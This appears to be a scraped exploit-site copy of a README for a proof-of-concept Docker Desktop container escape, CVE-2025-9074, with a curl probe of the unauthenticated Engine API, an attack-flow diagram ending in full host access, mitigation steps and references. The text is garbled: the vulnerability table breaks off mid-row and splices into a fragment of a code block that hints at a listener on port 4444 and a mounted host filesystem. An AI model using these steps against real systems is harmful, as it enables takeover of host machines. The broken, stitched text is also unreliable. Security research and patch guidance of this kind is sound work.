Share
## https://sploitus.com/exploit?id=69123871-A980-52ED-BF7E-C25EC8D54FDB
# CVE-2025-9074: Docker Desktop Container Escape PoC

![CVE](https://img.shields.io/badge/CVE-2025--9074-critical)
![CVSS](https://img.shields.io/badge/CVSS-9.3-critical)
![Platform](https://img.shields.io/badge/Platform-Windows%20%7C%20macOS-blue)

Proof of Concept exploit for **CVE-2025-9074** - a critical container escape vulnerability in Docker Desktop that allows unauthenticated access to the Docker Engine API.

## Vulnerability Overview

| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-9074 |
| **CVSS Score** | 9.3 (Critical) |
| **Affected Software** | Docker Desktop  -p 4444

# Once connected, host filesystem is at: /hostfs
```

### From Inside a Container
```bash
# If you already have access to a container
curl http://192.168.65.7:2375/version
```

## Attack Scenario
```mermaid
graph TD
    A[Malicious Container] -->|No Auth Required| B[Docker Engine API192.168.65.7:2375]
    B -->|Create Container| C[Privileged Container]
    C -->|Mount Host FS| D[Full Host Access]
    D -->|Read/Write| E[Compromise System]
```

## Mitigation

### Immediate Action Required
**Update to Docker Desktop 4.44.3 or later immediately.**
```bash
# Check your Docker Desktop version
docker --version

# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg
```

### Workarounds (Temporary)
If immediate update is not possible:
1. Avoid running untrusted containers
2. Monitor network connections from containers
3. Implement network segmentation
4. Review all container images before deployment

## References

- [Docker Security Advisory](https://docs.docker.com/desktop/release-notes/#4443)
- [NVD CVE-2025-9074](https://nvd.nist.gov/vuln/detail/CVE-2025-9074)
- [Felix Boulet's Blog](https://blog.qwertysecurity.com/Articles/blog3.html)
- [Philippe Dugré's Analysis](https://pvotal.tech/breaking-dockers-isolation-using-docker-cve-2025-9074/)
- [GitHub Advisory](https://github.com/advisories/GHSA-4xcq-3fjf-xfqw)

## Disclaimer

This tool is provided for **educational and authorized security testing purposes only**. 

- Only use against systems you own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- The authors assume no liability for misuse of this software

## Credits

- **Vulnerability Discovery**: Felix Boulet, Philippe Dugré
- **PoC Development**: Amanja Francisco
- **Docker Security Team**: For rapid response and patch

## License

MIT License - See LICENSE file for details